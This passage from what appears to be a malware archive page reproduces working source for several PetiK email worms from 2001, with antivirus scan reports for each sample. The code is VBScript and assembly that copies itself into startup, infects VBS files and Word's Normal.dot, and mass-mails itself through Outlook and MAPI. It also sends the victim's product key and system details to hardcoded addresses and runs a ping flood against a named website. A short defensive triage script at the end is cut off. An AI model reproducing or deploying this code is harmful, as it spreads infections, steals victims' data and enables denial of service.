callx RegQueryValueExA push [RegHandle] callx RegCloseKey TIF_CUR:push offset Buffer callx SetCurrentDirectoryA call FFF FIN: FFF: push 00h callx ExitProcess

push offset HTM @pushsz "*.htm*" callx FindFirstFileA mov edi,eax cmp eax,-1 je FIN P_HTM: call parse_html FNF: push offset HTM push edi callx FindNextFileA test eax,eax jnz P_HTM FC: push edi callx FindClose ret parse_html: pushad push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset HTM.FileName callx CreateFileA inc eax je FIN dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push callx xchg jecxz eax,eax eax eax eax PAGE_READONLY eax ebx CreateFileMappingA eax,eax ph_close eax,ebp eax,eax eax eax eax FILE_MAP_READ ebp MapViewOfFile eax,eax ph_close2 eax,esi 00h ebx GetFileSize eax,ecx ph_close3

;open the file

;create the file mapping

;map the file

;get its size

ls_scan_mail: call @mt db 'mailto:' @mt: pop edi l_scan_mail:

pushad push 7 pop ecx rep cmpsb popad je scan_mail inc esi loop l_scan_mail ph_close3: push callx ph_close2: push callx ph_close: push callx popad ret scan_mail: xor add mov push n_char: cmp je cmp je cmp je cmp jne inc o_a: stosb jmp s_char: jmp e_char: stosb pop test je call test jne call call jmp mapi_init: xor push push push push push push callx ret send: xor push push push push push callx ret close: push push esi UnmapViewOfFile ebp CloseHandle ebx CloseHandle

;search for "mailto:" ;string ;check the mail address ;in a loop

;unmap view of file ;close file mapping ;close the file

edx,edx esi,7 edi,offset mail_address edi lodsb al,' ' s_char al,'"' e_char al,'''' e_char al,'@' o_a edx n_char inc esi n_char xor al,al edi edx,edx ls_scan_mail mapi_init eax,eax ls_scan_mail send close ls_scan_mail eax,eax offset MAPIHandle eax eax eax eax eax MAPILogon eax,eax eax eax offset sMessage eax [MAPIHandle] MAPISendMail xor eax eax eax,eax

;where to store the ;mail address

;if EDX=0, mail is not ;valid (no '@')

push eax push 12345678h MAPIHandle = dword ptr $-4 callx MAPILogoff ret add_ad: ;@pushsz "C:\carnet.txt" ;push offset mail_address ;push offset mail_address ;@pushsz "Carnet d'adresses" ;callx WritePrivateProfileStringA ret .data htmd: db '<html><head><title>Loft Story WEB Page</title></head>',0dh,0ah db '<font face=''verdana'' color=green size=''2''>Please accept ActiveX ' db 'to see this page<br><br> Internet Explorer<br><br> </font>',0dh,0ah db '<SCRIPT Language=VBScript>',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'Set w=CreateObject("WScript.Shell")',0dh,0ah db 'w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ActiveX 1.0",' db '"C:\ActiveX.vbs"',0dh,0ah db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Download Directory",' db '"C:\"',0dh,0ah db 'document.write "Please download the file ""ActiveX.vbs"" to correct a bug ' db 'in Internet Explorer"',0dh,0ah db 'document.write "<br>Connect you to internet to download the file<br>"',0dh,0ah db 'document.write "<br><h2>If you don''t accept ActiveX the syntax failed<h2>"',0dh,0ah db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",' db '"http://www.ctw.net/euphoria/ActiveX.vbs"',0dh,0ah db '</SCRIPT></body></html>',0dh,0ah HTMTAILLE equ $-htmd szCopie szCopieb szOrig szWinini Buffer BufferSize FileHandle RegHandle regDisp regResu octets hdll hdll2 netcheck setvalue mail_address Temp ValueType sMessage dd dd dd dd dd dd dd dd dd dd dd dd db db db db dd dd dd dd dd dd db db db db db dd dd dd dd dd dd dd dd dd dd db dd dd 50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 7Fh dup (0) 7Fh ? ? 0 0 ? ? ? ? ? 128 dup (?) 0 0 subject body date mFrom mTo attach

? offset offset ? offset ? 2 offset 1 offset 1 offset

subject body date sender mFrom

"Loft Story News...",00h "The last video of the <Loft story> program",00h "07/01/2001",00h "b_castaldi@loftstory.fr",00h ? ? offset mFrom offset sender ? ?

mTo

dd dd dd dd dd dd dd dd dd dd dd dd

? 1 offset mTo offset mail_address ? ? ? ? ? offset szCopieb ? ? equ equ equ equ equ equ equ equ equ equ equ equ 00000002h 00000080h 00000002h 00000004h 00000001h 80000000h 40000000h 80000001h 80000002h 80000003h 00000003h 00000002h

attach

CREATE_ALWAYS FILE_ATTRIBUTE_NORMAL FILE_END FILE_MAP_READ FILE_SHARE_READ GENERIC_READ GENERIC_WRITE HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS OPEN_EXISTING PAGE_READONLY SYSTIME wYear wMonth wDayOfWeek wDay wHour wMinute wSecond wMillisecond SYSTIME SystemTime filetime LowDateTime HighDateTime filetime win32 Fileattributes CreationTime LastAccessTime LastWriteTime FileSizeHigh FileSizeHow Reserved0 Reserved1 FileName AlternativeName win32 HTM win32 <> end DEBUT end

struct WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? ends SYSTIME <> struct dd ? dd ? ends struct dd ? filetime ? filetime ? filetime ? dd ? dd ? dd ? dd ? dd 260 (?) db 13 dup (?) db 3 dup (?) ends

ACTIVEX.VBS On Error Resume Next Set f=CreateObject("Scripting.FileSystemObject") Set w=CreateObject("WScript.Shell") Set ws=Wscript.CreateObject("WScript.Shell") startup=ws.SpecialFolders("Startup") If f.FileExists (startup&"\Loft.htm") Then f.DeleteFile (startup&"\Loft.htm") MsgBox "Patch for Internet Explorer installed",vbinformation,"Patch v1.0" MsgBox "You can delete this file",vbinformation,"Patch v1.0" End If CN=CreateObject("WScript.NetWork").ComputerName UN=CreateObject("WScript.NetWork").UserName UD=CreateObject("WScript.NetWork").UserDomain NOM=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ENT=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") PI=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") PK=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") V=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") VN=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") P=w.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage") Set O=CreateObject("Outlook.Application") Set m=O.CreateItem(0) m.To = "loftptk@multimania.com" m.BCC = "petik@multimania.com; euphoria@ctw.net" m.Subject="Loft Info arrivant de " & P n = "Date : " & date n = n & VbCrLf & "Heure : " & time n = n & VbCrLf & "Nom d'enregistrement : " & NOM n = n & VbCrLf & "Nom de l'organization : " & ENT n = n & VbCrLf & "Numéro d'identification : " & PI n = n & VbCrLf & "Numéro d'enregistrement : " & PK n = n & VbCrLf & "Version de Windows : " & V & " " & VN n = n & VbCrLf & "Nom de l'ordinateur : " & CN n = n & VbCrLf & "Nom de domaine : " & UD n = n & VbCrLf & "Nom d'utilisateur : " & UN m.Body = n m.DeleteAfterSubmit=True m.Send w.RegWrite "HKCU\Software\Microsoft\PetiK\LoftInfo","OK" w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.yahoo.fr"

File Loft.exe received on 05.16.2009 17:51:42 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.16 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.16 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.16 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.16 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 PCTools 4.4.2.0 2009.05.16 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.16 Additional information File size: 8704 bytes MD5...: ee8e03e0a5251a340fe2c08fd7f9c2e4 SHA1..: 4144791ec8571744fe9905309bb6bf7199485a37

Result Email-Worm.Win32.Petik!IK Win32/PetTick.8704.B Worm/Petik.14 Worm/Win32.Win32 W32/Malware!cec4 Win32:Petik-LoftStory I-Worm/Petik.F Win32.Ltof.A@mm W32.Petik.K Worm.Win32.Petik.K Win32.Petik.8704 Win32/Petik.8704.B W32/Malware!cec4 Email-Worm.Win32.Petik VBS/Petik.E Win32.Ltof.A@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.14 Worm:Win32/PetTick@mm Win32/Petik.K W32/Pet_Tick.8704.B Worm/W32.Petik.8704 W32/Petik.K HTML.Loft.A Medium Risk Malware Worm.Mail.Petik.i W32/Petik-K BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen W32/PetTick@MM Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.8704.B HTML.Loft.A


Name : VBS.Delirious
Author : PetiK
Language : VBS
Date : 28/06/2001
Copies itself to %WINDIR%\Delirious.vbs
Runs at each start by writing a new value in HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Displays a fake message if the running file is not Delirious.vbs
Infects all VBS files
Infects Normal.dot
Spreads with Outlook

On Error Resume Next Set sf=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=sf.OpenTextFile(WScript.ScriptFullName,1) virus=fl.ReadAll Set win=sf.GetSpecialFolder(0) Set sys=sf.GetSpecialFolder(1) Set cpy=sf.GetFile(WScript.ScriptFullName) cpy.Copy(win&"\Delirious.vbs") r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Delire") ws.RegWrite r,(win&"\Delirious.vbs") If cpy <> (win&"\Delirious.vbs") Then MsgBox cpy&" is not a VBS file valid.",vbcritical,cpy else Disque() Word() Spread() If Day(Now)=1 Then MsgBox "Look at my new virus !"+VbCrLf+"Delirious, isn't it ??",vbinformation,"VBS.Delirious coded by PetiK (c)2001" End If bureau=ws.SpecialFolders("Desktop") Set link=ws.CreateShortCut(bureau&"\Site_Web.url") link.TargetPath="http://www.jememarre.com" link.Save End If Sub Disque If not sf.FileExists (sys&"\DeliriousFile.txt") Then Set DF=sf.CreateTextFile(sys&"\DeliriousFile.txt") DF.WriteLine "Infected file by VBS.Delirious" DF.WriteLine "Fichiers infectés par VBS.Delirious :" DF.WriteBlankLines(1) DF.Close End If Set dr=sf.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then liste(d.path&"\") End If Next End Sub Sub infection(dossier) Set f=sf.GetFolder(dossier) Set fc=f.Files For Each F in fc ext=sf.GetExtensionName(F.path) ext=lcase(ext) If (ext="vbs") Then Set verif=sf.OpenTextFile(F.path, 1, False) If verif.ReadLine <> "'VBS.Delirious" Then tout=verif.ReadAll() verif.Close Set inf=sf.OpenTextFile(F.path, 2, True) inf.Write(virus) inf.Write(tout) inf.Close Set DF=sf.OpenTextFile(sys&"\DeliriousFile.txt", 8, True) DF.WriteLine F.path DF.Close

End If End If Next End Sub Sub liste(dossier) Set f=sf.GetFolder(dossier) Set sd=f.SubFolders For Each F in sd infection(F.path) liste(F.path) Next End Sub Sub Word() On Error Resume Next Set CODE=sf.CreateTextFile(sys&"\DeliriousCode.txt") CODE.Write(virus) CODE.Close If ws.RegRead("HKLM\Software\Microsoft\Delirious\InfectNormal") <> "OK" Then Set wrd=WScript.CreateObject("Word.Application") wrd.Visible=False Set NorT=wrd.NormalTemplate.VBProject.VBComponents NorT.Import sys&"\DeliriousCode.txt" wrd.Run "Normal.ThisDocument.AutoExec" wrd.Quit ws.RegWrite "HKLM\Software\Microsoft\Delirious\InfectNormal","OK" End If End Sub Sub Spread() WHO=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") Set OA=CreateObject("Outlook.Application") Set MA=OA.GetNameSpace("MAPI") For Each C In MA.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.Count Set AD=C.AddressEntries(D) Set EM=OA.CreateItem(0) EM.To=AD.Address EM.Subject="Delirious EMail from " & WHO body="Hi " & AD.Name & "," body = body & VbCrLf & "Look at this funny attached." body = body & VbCrLf & "" body = body & VbCrLf & " Best Regards " & WHO EM.Body=body EM.Attachments.Add(win&"\Delirious.vbs") EM.DeleteAfterSubmit=True If EM.To <> "" Then EM.Send End If Next End If Next End Sub

File Delirious.vbs received on 05.16.2009 11:30:16 (CET)

Antivirus          Version          Last Update
a-squared          4.0.0.101        2009.05.16
AhnLab-V3          5.0.0.2          2009.05.15
AntiVir            7.9.0.168        2009.05.15
Antiy-AVL          2.0.3.1          2009.05.15
Authentium         5.1.2.4          2009.05.15
Avast              4.8.1335.0       2009.05.15
AVG                8.5.0.336        2009.05.15
BitDefender        7.2              2009.05.16
CAT-QuickHeal      10.00            2009.05.15
ClamAV             0.94.1           2009.05.15
Comodo             1157             2009.05.08
DrWeb              5.0.0.12182      2009.05.16
eSafe              7.0.17.0         2009.05.14
eTrust-Vet         31.6.6508        2009.05.16
F-Prot             4.4.4.56         2009.05.15
F-Secure           8.0.14470.0      2009.05.15
Fortinet           3.117.0.0        2009.05.16
GData              19               2009.05.16
Ikarus             T3.1.1.49.0      2009.05.16
K7AntiVirus        7.10.735         2009.05.14
Kaspersky          7.0.0.125        2009.05.16
McAfee             5616             2009.05.15
McAfee+Artemis     5616             2009.05.15
McAfee-GW-Edition  6.7.6            2009.05.15
Microsoft          1.4602           2009.05.16
NOD32              4080             2009.05.15
Norman             6.01.05          2009.05.16
nProtect           2009.1.8.0       2009.05.16
Panda              10.0.0.14        2009.05.15
PCTools            4.4.2.0          2009.05.15
Prevx              3.0              2009.05.16
Rising             21.29.52.00      2009.05.16
Sophos             4.41.0           2009.05.16
Sunbelt            3.2.1858.2       2009.05.16
Symantec           1.4.4.12         2009.05.16
TheHacker          6.3.4.1.326      2009.05.15
TrendMicro         8.950.0.1092     2009.05.15
VBA32              3.12.10.5        2009.05.16
ViRobot            2009.5.15.1737   2009.05.15
VirusBuster        4.6.5.0          2009.05.15

Result (34 detection names reported by the 40 engines; the report does not preserve which engine returned which name):
Email-Worm.Win32.Petik!IK, VBS/Petik, Worm/Petik.AV.01, Worm/Win32.Win32, VBS/Petik.A@mm, VBS:MailWorm-gen, I-Worm/Petik, Generic.ScriptWorm.FCCA075D, VBS.Petik.H, Worm.Win32.Email-Worm.Petik, VBS.Petik, VBS.MailSender., VBS/VBSWG!generic, VBS/Petik.A@mm, Email-Worm.Win32.Petik, VBS/Petik.H@mm, Generic.ScriptWorm.FCCA075D, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, VBS/Louse@MM, VBS/Louse@MM, Worm.Petik.AV.01, Virus:VBS/Louse@mm.gen, probably unknown SCRIPT, VBS/Louse.A@mm, VBS.Petik.L@mm, VBS/Petik.H, VBS.Petik.H, Worm.Hopalong, VBS/Petik-H, VBS.Pet_Tick.C@m, VBS_PETIK.H, Email-Worm.Win32.Petik, VBS.Petik.H

Additional information
File size: 3112 bytes
MD5:    6e8ba64159c0520ecd7781951dd11fca
SHA1:   3a176e6646fd14f44074dd9d59122278bafe608c
SHA256: bd2901cb43b873fb0ba5573641a56d24c066069302c7e275555665b12c86a2d8

comment #
Name   : I-Worm.Bush
Author : PetiK
Date   : July 1st
Size   : 8192 bytes
Action : If the running file is not \WINDOWS\SYSTEM\BIOS.EXE, the worm copies
         itself there (and to \WINDOWS\Bush.exe) and rewrites the run= line
         of WIN.INI so that it starts at every boot.
         Otherwise it creates \WINDOWS\Carnet.vbs and adds a value to the Run
         key so that the script runs at every boot. If the file already
         exists it does nothing.
         It then waits for an Internet connection; once connected it displays
         a message and mails a copy of itself to the addresses the VBS file
         collected.
         Finally, on Wednesdays, it pings the site of G.W. Bush.
To compile :
         tasm32 /M /ML Bush
         tlink32 -Tpe -aa -x Bush,,,import32
         C:\TASM32\BIN\brc32 bush.rc
#

.586p
.model flat
.code
callx macro a
      extrn a:proc
      call a
endm
include useful.inc

SIGNATURE db "I-Worm.Bush "
          db "by PetiK (c) 2001",00h

DEBUT:
VERIF:  push    00h
        callx   GetModuleHandleA
        push    50
        push    offset szOrig
        push    eax
        callx   GetModuleFileNameA
        push    50h
        push    offset szCopie
        callx   GetSystemDirectoryA
        @pushsz "\BIOS.EXE"
        push    offset szCopie
        callx   lstrcat
        push    50h
        push    offset szCopieb
        callx   GetWindowsDirectoryA
        @pushsz "\Bush.exe"
        push    offset szCopieb
        callx   lstrcat
        push    offset szOrig
        push    offset szCopie
        callx   lstrcmp
        test    eax,eax
        jz      CAR_A
COPIE:  push    00h
        push    offset szCopie
        push    offset szOrig
        callx   CopyFileA
        push    00h
        push    offset szCopieb
        push    offset szOrig
        callx   CopyFileA

WININI: push    50
        push    offset szWinini
        callx   GetWindowsDirectoryA
        @pushsz "\\WIN.INI"
        push    offset szWinini
        callx   lstrcat
        push    offset szWinini
        push    offset szCopie
        @pushsz "run"
        @pushsz "windows"
        callx   WritePrivateProfileStringA
MESSAGE:push    30h
        @pushsz "Error Load Library"
        @pushsz "Cannot run the Dynamic Link Library GWBios.dll"
        push    00h
        callx   MessageBoxA
        jmp     FIN

CAR_A:  push    50
        push    offset szCarnet
        callx   GetWindowsDirectoryA
        @pushsz "\Carnet.vbs"
        push    offset szCarnet
        callx   lstrcat
        push    00h
        push    FILE_ATTRIBUTE_NORMAL
        push    CREATE_NEW
        push    00h
        push    FILE_SHARE_READ
        push    GENERIC_WRITE
        push    offset szCarnet
        callx   CreateFileA
        cmp     eax,-1
        je      DLL
        mov     [FH],eax
        push    00h
        push    offset octets
        push    VBSTAILLE
        push    offset vbsd
        push    [FH]
        callx   WriteFile
        push    [FH]
        callx   CloseHandle
REG:    @pushsz "SHLWAPI.dll"
        callx   LoadLibraryA
        test    eax,eax
        jz      DLL
        mov     hdll,eax
        @pushsz "SHSetValueA"
        push    hdll
        callx   GetProcAddress
        test    eax,eax
        jz      DLL
        mov     setvalue,eax
RUN_C:  push    08h
        push    offset szCarnet
        push    01h
        @pushsz "Carnet d'adresses"
        @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
        push    80000002h
        call    setvalue
        push    [hdll]
        callx   FreeLibrary
DLL:    @pushsz "WININET.dll"
        callx   LoadLibraryA
        test    eax,eax
        jz      FIN
        mov     hdll,eax
        @pushsz "InternetGetConnectedState"
        push    hdll
        callx   GetProcAddress
        test    eax,eax
        jz      FIN
        mov     netcheck,eax
        jmp     NET
DODO:   push    10000
        callx   Sleep
NET:    push    00h
        push    offset Temp
        call    [netcheck]
        dec     eax
        jnz     DODO

NET_OK: push    40h
        @pushsz "G.W.Bush"
        @pushsz "The man who want to kill poeple and the earth"
        push    00h
        callx   MessageBoxA
FINDLL: push    [hdll]
        callx   FreeLibrary
JOUR:   push    offset SystemTime
        callx   GetSystemTime
        cmp     [SystemTime.wDayOfWeek],03h
        jne     JOUR2
DoS:    push    01h
        @pushsz "ping -l 10000 -t www.georgewbush.com"
        callx   WinExec
        push    40h
        @pushsz "Internet"
        @pushsz "You can go to the web site : www.georgewbush.com"
        push    00h
        callx   MessageBoxA

JOUR2:  push    offset SystemTime
        callx   GetSystemTime
        cmp     [SystemTime.wDay],25
        jne     TXT
        push    40h
        @pushsz "I-Worm.Bush"
        @pushsz "Coded by PetiK (c)2001. To show my anger against this man."
        push    00h
        callx   MessageBoxA
TXT:    pushad
        push    50
        push    offset szCarnet2
        callx   GetWindowsDirectoryA
        @pushsz "\Carnet.txt"
        push    offset szCarnet2
        callx   lstrcat
        push    00h
        push    FILE_ATTRIBUTE_NORMAL
        push    OPEN_EXISTING
        push    00h
        push    FILE_SHARE_READ
        push    GENERIC_READ
        push    offset szCarnet2
        callx   CreateFileA
        cmp     eax,-1
        je      RETOUR
        xchg    eax,ebx
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    PAGE_READONLY
        push    eax
        push    ebx
        callx   CreateFileMappingA
        test    eax,eax
        je      CL1
        xchg    eax,ebp
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    FILE_MAP_READ
        push    ebp
        callx   MapViewOfFile
        test    eax,eax
        je      CL2
        xchg    eax,esi
        push    00h
        push    ebx
        callx   GetFileSize
        xchg    eax,ecx
        jecxz   CL3
d_scan_mail:
        call    @mlt
        db      'mailto:'
@mlt:   pop     edi
scn_mail:
        pushad
        push    07h
        pop     ecx
        rep     cmpsb
        popad
        je      scan_mail
        inc     esi
        loop    scn_mail
CL3:    push    esi
        callx   UnmapViewOfFile
CL2:    push    ebp
        callx   CloseHandle
CL1:    push    ebx
        callx   CloseHandle
RETOUR: popad
FIN:    push    00h
        callx   ExitProcess

; copy the address that follows "mailto:" into m_addr, then send if it holds an '@'
scan_mail:
        xor     edx,edx
        add     esi,7                     ; size of the string "mailto:"
        mov     edi,offset m_addr
        push    edi
p_car:  lodsb
        cmp     al,' '
        je      car_s
        cmp     al,'"'
        je      car_f
        cmp     al,'@'
        jne     not_a
        inc     edx
not_a:  stosb
        jmp     p_car
car_s:  inc     esi
        jmp     p_car
car_f:  xor     al,al
        stosb
        pop     edi
        test    edx,edx
        je      d_scan_mail               ; if edx=0 no @
        call    send
        jmp     d_scan_mail
send:   xor     eax,eax
        push    eax
        push    eax
        push    offset sMessage
        push    eax
        push    [MAPIh]
        callx   MAPISendMail
        ret

.data
szCarnet  db 50 dup (0)
szCarnet2 db 50 dup (0)
szCopie   db 50 dup (0)
szCopieb  db 50 dup (0)
szOrig    db 50 dup (0)
szWinini  db 50 dup (0)
FH        dd ?
octets    dd ?
hdll      dd ?
netcheck  dd ?
setvalue  dd ?
shfolder  dd ?
m_addr    db 128 dup (?)
Temp      dd 0
MAPIh     dd 0

sMessage  dd ?                            ; MapiMessage: ulReserved
          dd offset subject               ; lpszSubject
          dd offset body                  ; lpszNoteText
          dd ?                            ; lpszMessageType
          dd offset date                  ; lpszDateReceived
          dd ?                            ; lpszConversationID
          dd 2                            ; flFlags
          dd offset mFrom                 ; lpOriginator
          dd 1                            ; nRecipCount
          dd offset mTo                   ; lpRecips
          dd 1                            ; nFileCount
          dd offset attach                ; lpFiles

subject   db "Important and confidential information about...",00h
body      db "...the powerfulest man of the world.",0dh,0ah
          db "Look at this attachment to better know this man.",0dh,0ah,0dh,0ah
          db "Visit his site (www.georgewbush.com) on Wednesday.",0dh,0ah,0dh,0ah
          db 09h,"Best Regards",00h
date      db "07/01/2001",00h
sender    db "webmaster@rnc.org",00h

mFrom     dd ?                            ; MapiRecipDesc: ulReserved
          dd ?                            ; ulRecipClass
          dd offset mFrom                 ; lpszName
          dd offset sender                ; lpszAddress
          dd ?                            ; ulEIDSize
          dd ?                            ; lpEntryID

mTo       dd ?
          dd 1                            ; MAPI_TO
          dd offset mTo
          dd offset m_addr
          dd ?
          dd ?

attach    dd ?                            ; MapiFileDesc: ulReserved
          dd ?                            ; flFlags
          dd ?                            ; nPosition
          dd offset szCopieb              ; lpszPathName
          dd ?                            ; lpszFileName
          dd ?                            ; lpFileType

vbsd:   db 'On Error Resume Next',0dh,0ah
        db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
        db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
        db 'If not f.FileExists (f.GetSpecialFolder(0)&"\Carnet.txt") Then',0dh,0ah
        db 'Set cr=f.CreateTextFile(f.GetSpecialFolder(0)&"\Carnet.txt")',0dh,0ah
        db 'cr.Close',0dh,0ah
        db 'End If',0dh,0ah
        db 'Set OA=CreateObject("Outlook.Application")',0dh,0ah
        db 'Set MA=OA.GetNameSpace("MAPI")',0dh,0ah
        db 'For each A In MA.AddressLists',0dh,0ah
        db 'If A.Addressentries.Count <> 0 Then',0dh,0ah
        db 'For B=1 To A.AddressEntries.Count',0dh,0ah
        db 'Set C=A.AddressEntries(B)',0dh,0ah
        db 'If w.RegRead ("HKCU\Software\Bush\" & C.Address) <> "OK" Then',0dh,0ah
        db 'Set car=f.OpenTextFile(f.GetSpecialFolder(0)&"\Carnet.txt", 8, True)',0dh,0ah
        db 'car.WriteLine """mailto:" & C.Address & """"',0dh,0ah
        db 'car.Close',0dh,0ah
        db 'w.RegWrite "HKCU\Software\Bush\" & C.Address,"OK"',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
VBSTAILLE equ $-vbsd

CREATE_NEW            equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ         equ 00000004h
FILE_SHARE_READ       equ 00000001h
GENERIC_READ          equ 80000000h
GENERIC_WRITE         equ 40000000h
OPEN_EXISTING         equ 00000003h
PAGE_READONLY         equ 00000002h

SYSTIME struct
  wYear         WORD ?
  wMonth        WORD ?
  wDayOfWeek    WORD ?
  wDay          WORD ?
  wHour         WORD ?
  wMinute       WORD ?
  wSecond       WORD ?
  wMillisecond  WORD ?
SYSTIME ends

SystemTime SYSTIME <>

end DEBUT

File Bush.exe received on 05.16.2009 11:20:57 (CET)

Antivirus          Version          Last Update
a-squared          4.0.0.101        2009.05.16
AhnLab-V3          5.0.0.2          2009.05.15
AntiVir            7.9.0.168        2009.05.15
Antiy-AVL          2.0.3.1          2009.05.15
Authentium         5.1.2.4          2009.05.15
Avast              4.8.1335.0       2009.05.15
AVG                8.5.0.336        2009.05.15
BitDefender        7.2              2009.05.16
CAT-QuickHeal      10.00            2009.05.15
ClamAV             0.94.1           2009.05.15
Comodo             1157             2009.05.08
DrWeb              5.0.0.12182      2009.05.16
eTrust-Vet         31.6.6508        2009.05.16
F-Prot             4.4.4.56         2009.05.15
F-Secure           8.0.14470.0      2009.05.15
Fortinet           3.117.0.0        2009.05.16
GData              19               2009.05.16
Ikarus             T3.1.1.49.0      2009.05.16
K7AntiVirus        7.10.735         2009.05.14
Kaspersky          7.0.0.125        2009.05.16
McAfee             5616             2009.05.15
McAfee+Artemis     5616             2009.05.15
Microsoft          1.4602           2009.05.16
NOD32              4080             2009.05.15
Norman             6.01.05          2009.05.16
nProtect           2009.1.8.0       2009.05.16
Panda              10.0.0.14        2009.05.15
PCTools            4.4.2.0          2009.05.15
Prevx              3.0              2009.05.16
Rising             21.29.52.00      2009.05.16
Sophos             4.41.0           2009.05.16
Sunbelt            3.2.1858.2       2009.05.16
Symantec           1.4.4.12         2009.05.16
TheHacker          6.3.4.1.326      2009.05.15
TrendMicro         8.950.0.1092     2009.05.15
VBA32              3.12.10.5        2009.05.16
ViRobot            2009.5.15.1737   2009.05.15
VirusBuster        4.6.5.0          2009.05.15

Result (34 detection names reported by the 38 engines; the report does not preserve which engine returned which name):
Email-Worm.Win32.Petik!IK, Win32/Peti, Worm/Petik.13, Worm/Win32.Win32, W32/Petik.B@mm, Win32:Petik-Bush, I-Worm/Petik, Win32.Pettick.E@mm, I-Worm.Petik, Worm.Win32.Petik.AA, Win32.Petik.9216, Win32/Petik.8192.A, W32/Petik.B@mm, Email-Worm.Win32.Petik, W32/Petik.B@mm, Win32.Pettick.E@mm, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, W32/PetTick@MM, W32/PetTick@MM, Worm:Win32/Petick.E@mm, Win32/Petik.AA, W32/Petik.O, W32/Petik.W.worm, I-Worm.Petgwb.A, Worm.Mail.Petik.b, W32/Bush, BehavesLike.Win32.Malware (v), W95.Pet_Tick.gen, W32/PetTick@MM, WORM_PET.TICK.E, Win32.Worm.Petik.8192, I-Worm.Petgwb.A

Additional information
File size: 9216 bytes
MD5:  1defedea5174374180d660693622fb90
SHA1: f8047ed4d150dfd6ae9e8fd5cd6146c960570f1b
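The host artefacts named in the descriptions on this page are what a responder looks for on a disk image: the run= line of WIN.INI, the Run value "Carnet d'adresses" pointing at Carnet.vbs, the value under HKCU\Software\Bush written for every address Carnet.vbs mailed, the HKLM\Software\Microsoft\Delirious\InfectNormal marker, and (further down the page) the Start Page that MaLoTeYa's HTML payload sets. The following is an added example, not PetiK's code: an offline Python triage of a WIN.INI file and a regedit .reg export. Both inputs are constructed samples; the paths, value names and data are taken from the sources on this page.

```python
"""Offline triage for the host artefacts the PetiK worms on this page leave
behind. Added example; not PetiK's code. The inputs below are constructed
samples, not captures from an infected machine."""

# Constructed WIN.INI as I-Worm.Bush rewrites it: run= points at the copy
# the worm made in \WINDOWS\SYSTEM\BIOS.EXE.
SAMPLE_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\SYSTEM\\BIOS.EXE
NullPort=None

[intl]
sCountry=France
"""

# Constructed regedit export. One benign Run value is included so the scan
# shows it matches specific names rather than flagging everything under Run.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
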